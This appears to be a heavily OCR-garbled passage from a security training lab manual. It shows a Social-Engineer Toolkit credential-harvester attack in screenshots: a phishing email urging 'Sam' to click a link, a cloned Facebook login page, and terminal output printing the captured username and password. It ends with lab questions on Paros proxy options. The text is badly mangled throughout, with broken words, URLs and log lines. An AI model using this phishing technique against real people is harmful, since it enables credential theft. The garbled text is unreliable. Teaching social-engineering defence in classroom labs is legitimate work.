Saved Discard Labels Draft autnsaved at 11:01 AM (0 minutes ago) 0

To @yahoo com, BAdd Cc Add Bcc

Subjed TGI F- Party Pictures

Attach a 10

Sf B I U T - T - A, T - oo | - IE 3 i s H =3 ^ ,piain roxt chock spoiling'Hello Sam.

Pt-*M click this Ilfikj www t:|tr.ocinle Q,

x Comp os e Mail - - ipgmml.com - Gmail Mozilla FirefoxFile d1t yie* History gookmarks !0015 ftelp

M Compose Mail -

V 5r' oogle.com

+ Share F I

0

A Track Linux |Offensive Security |lExploit-DB J Aircrack-ng fefiSomaFM

G o u g l e

ages Maps Play YouTube

Discard Labels Draft autosaved at 11:01 AM (0 minutes ago)

@yahoo.c

Add Cc Add Bcc

Sucject @TGi F - Party Pictures

Attach a no

B I U T tT * A M jE IE = 1 M E = 1 /x Plain Text Check Spelling-

Please click this link ww\v.facebook.CQfr!


26/28


facebookSign Up Connect and share with the people in your Ife.

Tarpbook 1ogin

(mart or t*hon*:

Password: ----

| 1 Keep me lowedin

or Siga upfor tacetoook

Forgot yourosss*vord?

!kwo fflOjOge =33and Rrtugjes (=t)fcngist

F3Lcb5x S 2012 MobleFind FriendsEodces PeoplePoqcsAfccut Crca* er Ad Create a Page Privacy Coatses TerreDevelopers Careers

mQ log1n|h>cbook \

1


27/28


* v x TerminalFile Edit View Terminal Help

[*] Social-Engineer Toolkit Credential Harvester Attack.[*j Credential Harvester is running on port 80

[*j Information will be displayed to you as i*--~ hrl" 10.0.0.2 - - [26/Sep/2012 11:10:41] GET / HTTP/1.1 200 -[* ] WE GOT A HIT! Pr in tin g the output:

PARAM: lsd=AVqgmkGhPARAM: return session=0PARAM: legacy return=lPARAM: displayPARAM: session key only=0PARAM: trynu!n=l

lo.n=Log+In

HIT CONTROL-C TO GENERATE A REPORT.

charset test=, ,fltimezone=-330lgnrnd=224034 ArY/U

POSSIB fe p J^n m |FK LD F*% ) :

PARAM: default persistent=QPOSSIBLE USERNAME FIELD FOUND:

[ ] WHEN YOU'RE FINISHED,

PARAMPARAMPARAMPARAM0OSSI

FIG U RE 3.17: SE T found Username and Password

2 2 . P r e s s CT RL + C to g e n e r a t e a re p o r t t o r t h is a t t a c k p e r fo r m e d .

/v v x TerminalFile Edit View Terminal Help

PARAM: lsd=AVqgmkGhPARAM: return session=0PARAM: legacy return=lPARAM: displayPARAM: session key only=0PARAM: trynu1=lPARAM: charset test=,/K ,fl,PARAM: tiraezone=-540

PARAM: Ignrnd=224034 ArYAPARAM: lgnjs=nPOSSIBLE USERNAME FIELD FOUND: emai l ' POSSIBLE PASSWORD FIELD FOUND: pass=test

PARAM: default persistent=0POSSIBLE USERNAME FIELD FOUND: l 0 gin=L0 g+In

[* ] WHEN YOU'RE FINISHE D-H IT C0N1R0L-C TO

L . I x'C[*] ftle exported to r Jwkts/20-09-fc 15::49:15.S4ftl5.lfL for your RasnMr w i W I V W l WA V f I X - [] File in XML format exported t(| reports/2012-09-26 15:49:15.5464l .xjr reading pleasure...

C TO GENERATE A REPOftf.

ts/20K-09-26 1H IE * *

to continuePress


28/28


T o o l / U t i l i t y I n fo rm a tio n C o l l e c t e d /O b j e c ti v e s A c h ie ve d

P A R A M : l s d = A V q g m k G 1 1

P A R A M : r e t u rn _ s e s s io n = 0P A R A M : l e g ac y _ r e tu r n = 1

P A R A M : d i s p la y s

P A R A M : s e s s i o n _ k e y _ o n l y = 0

S o c i a l

E n g i n e e r i n g

T o o l k i t

P A R A M : t rv n u m = 1

PARAM : c h a r se t_ t e s t= , ' , , ' ,

P A R A M : ti m e z o n e = - 5 4 0

P A R A M : lg n r n d = 2 2 4 03 4 _ A rY A

P A R A M : lg n j s = n

e m a11

= s a m c h o a n g @ y a h o o . c o mp a s s= te s t@ 1 2 3



Q u e s tio n s

1. Evaluate each o f the following Paros proxy options:

a. Trap Request

b. T ra p R esp o n se

c . Co nt inue bu t ton

d . D r o p b u t to n

I n t e r n e t C o n n e c t io n R e q u i r e d

0 Y es N o

P l a tf o rm S u p p o r te d

0 C l a ss ro o m !L abs
mailto:[email protected]:[email protected]